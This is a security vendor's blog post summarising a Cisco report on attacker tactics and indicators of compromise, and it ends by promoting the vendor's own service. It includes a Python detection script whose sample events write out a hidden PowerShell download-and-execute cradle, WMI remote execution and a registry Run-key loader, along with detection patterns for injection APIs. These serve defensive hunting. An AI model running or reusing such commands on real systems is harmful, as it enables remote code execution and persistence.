A new report released by Cisco this past Monday examines the most common attack trends observed in the wild during the first half of 2020. Cisco studied the most common tactics, techniques, and procedures (TTPs) used by Threat Actors, classified them using the MITRE ATT&CK framework, and outlined the Indicators of Compromise (IOCs) associated with these threats.
The MITRE ATT&CK framework is a comprehensive knowledge base of the tactics and techniques Threat Actors use to attack enterprise systems. Cisco’s findings show that the ATT&CK tactics most often observed against enterprise networks were defense evasion and execution.
MITRE defines defense evasion as the set of techniques Threat Actors use to avoid detection throughout a compromise. Examples include disabling security tools present in the environment, obfuscating malicious scripts, and abusing trusted, legitimate processes so that malicious activity blends in with normal behavior.
Execution, as MITRE defines it, covers the ways an attacker runs malicious code in a victim environment, whether through interactive commands or scripts. Much of the time the code is launched through legitimate, built-in Windows components such as Windows Management Instrumentation (WMI) and PowerShell, which rarely trip signature-based controls because the binaries themselves are trusted. Defenders can still see this activity if process command-line auditing and PowerShell script block logging are enabled, since it is the arguments and the script content, not the binary, that carry the malicious payload.
Cisco also took a close look at the Indicators of Compromise associated with these tactics. The most common IOCs observed in victim networks fell into three categories: fileless malware, PowerShell-based tooling, and credential dumping tools. Together these three account for 75% of the critical-severity IOCs in the report.
Fileless malware, the most prevalent IOC in Cisco’s report, has been a fixture of the threat landscape for several years. Unlike traditional malware it does not drop its payload as an executable on disk: the malicious code runs in memory, leaving little for file-scanning security tools to inspect. Two common ways it stays undetected are process injection (placing malicious code inside a legitimate, already-running process) and storing the payload in the Windows Registry, from which a small loader reads and executes it when the system starts. “Fileless” is therefore relative: the registry value used for persistence is itself an artifact that can be hunted.
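The following is an added example, not code from Cisco’s report or from SpearTip’s tooling, showing the kind of hunting logic a SOC can run over process-creation telemetry for the execution, evasion and persistence techniques described above. It flags PowerShell launched with hidden or no-profile switches, decodes -EncodedCommand payloads (Base64 over UTF-16LE text) so that a download cradle hidden inside them becomes visible, catches WMI remote process creation, and catches a PowerShell loader being written into the registry Run key. The sample events, the hostname FILESRV01, the 198.51.100.7 address, the registry path and the pattern weights are all constructed for illustration and should be tuned to your own environment.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Command-line patterns for PowerShell/WMI execution, in-memory loading and
# registry-based persistence, each with a weight. Constructed for this example.
PATTERNS: Dict[str, Tuple[re.Pattern, int]] = {
    "encoded_command": (re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"), 3),
    "download_cradle": (re.compile(r"(?i)\b(?:DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)\b"), 3),
    "invoke_expression": (re.compile(r"(?i)\b(?:IEX|Invoke-Expression)\b"), 2),
    "hidden_or_noprofile": (re.compile(r"(?i)-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?)\b"), 1),
    "wmi_process_create": (re.compile(r"(?i)\bwmic(?:\.exe)?\b.*\bprocess\b.*\bcall\b.*\bcreate\b|Invoke-WmiMethod|Win32_Process"), 3),
    "reflective_load": (re.compile(r"(?i)\[System\.Reflection\.Assembly\]::Load|VirtualAlloc|CreateRemoteThread|WriteProcessMemory"), 4),
    "registry_autorun_write": (re.compile(r"(?i)(?:\breg(?:\.exe)?\s+add|Set-ItemProperty|New-ItemProperty).*\\CurrentVersion\\Run(?:Once)?\b"), 3),
}


def decode_encoded_command(b64: str) -> Optional[str]:
    """Decode PowerShell's -EncodedCommand argument: Base64 over UTF-16LE text."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def encode_for_powershell(script: str) -> str:
    """Inverse of decode_encoded_command; used here only to build the sample events."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


@dataclass
class Finding:
    image: str
    cmdline: str
    hits: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    score: int = 0


def scan_text(text: str) -> Dict[str, int]:
    """Return {pattern_name: weight} for every pattern that matches the text."""
    return {name: weight for name, (rx, weight) in PATTERNS.items() if rx.search(text)}


def analyze_event(image: str, cmdline: str) -> Finding:
    finding = Finding(image=image, cmdline=cmdline)
    hits = scan_text(cmdline)
    # If the command line carries an encoded script, decode it and scan the
    # plaintext too: the cradle lives inside the Base64, not in the outer line.
    m = PATTERNS["encoded_command"][0].search(cmdline)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            finding.decoded = decoded
            hits.update(scan_text(decoded))
    finding.hits = sorted(hits)
    finding.score = sum(hits.values())
    return finding


def hunt(events, threshold: int = 5) -> List[Finding]:
    """Return the events whose weighted score reaches the alerting threshold."""
    return [f for f in (analyze_event(img, cl) for img, cl in events) if f.score >= threshold]


# Constructed sample process-creation events: (image path, command line).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
REG_STAGE = r"IEX (Get-ItemProperty -Path HKCU:\Software\Updater -Name Blob).Blob"

SAMPLE_EVENTS = [
    (PS, r"powershell.exe -File C:\Scripts\nightly-backup.ps1"),                     # benign admin script
    (PS, "powershell.exe -NoP -W Hidden -Enc " + encode_for_powershell(CRADLE)),     # encoded download cradle
    (r"C:\Windows\System32\wbem\WMIC.exe",
     'wmic /node:FILESRV01 process call create "powershell -nop -w hidden -c ' + CRADLE + '"'),  # WMI remote exec
    (r"C:\Windows\System32\reg.exe",
     r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "powershell -w hidden -enc '
     + encode_for_powershell(REG_STAGE) + '"'),                                       # registry-resident loader
    (r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -p"),               # benign
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"score={f.score:2d} hits={','.join(f.hits)}")
        print(f"  cmd: {f.cmdline[:90]}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

Decoding the encoded command before scoring is the step that matters most: the outer command line of the second event contains nothing but a Base64 blob, and only the decoded UTF-16LE text reveals the download cradle. The registry event shows why “fileless” still leaves artifacts: the Run value itself, and the loader it stores, are both visible in command-line telemetry.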
This information comes as no surprise to SpearTip’s Security Operations Center. Our team observes these TTPs and IOCs daily through our Incident Response and MDR practices. During a ransomware investigation we commonly find Mimikatz used for credential dumping, PowerShell Empire for running scripts in memory, Cobalt Strike for a range of post-exploitation actions, PsExec for remote execution of the ransomware payload, and banking trojans used to gain the initial foothold in the victim network.
The threat landscape evolves daily, so information like this is critical for network defenders and should be examined closely to decide where limited resources are best directed. Preventing modern threats requires a reliable endpoint detection and response (EDR) tool on every server and workstation; relying on traditional anti-virus agents alone to protect your systems is a serious mistake. SpearTip has responded to numerous major security incidents in which Threat Actors bypassed traditional AV tools with ease and remained undetected by the security team.
SpearTip’s ShadowSpear® Platform is well suited to detecting and preventing the advanced threats outlined in Cisco’s report. Its Memory Injection Prevention module in particular targets the in-memory evasion techniques Threat Actors rely on, and our SOC analysts, experienced in spotting these threats, monitor partner networks around the clock every day of the year.
SpearTip constantly watches for new malware and manipulative programs. Our 24/7 Security Operations Center (SOC) is fully staffed with cybersecurity professionals who monitor and protect your environment. Our teammates not only work continuously to prevent cyberattacks but can also deploy our proprietary tool, ShadowSpear®, in an environment before or after an attack.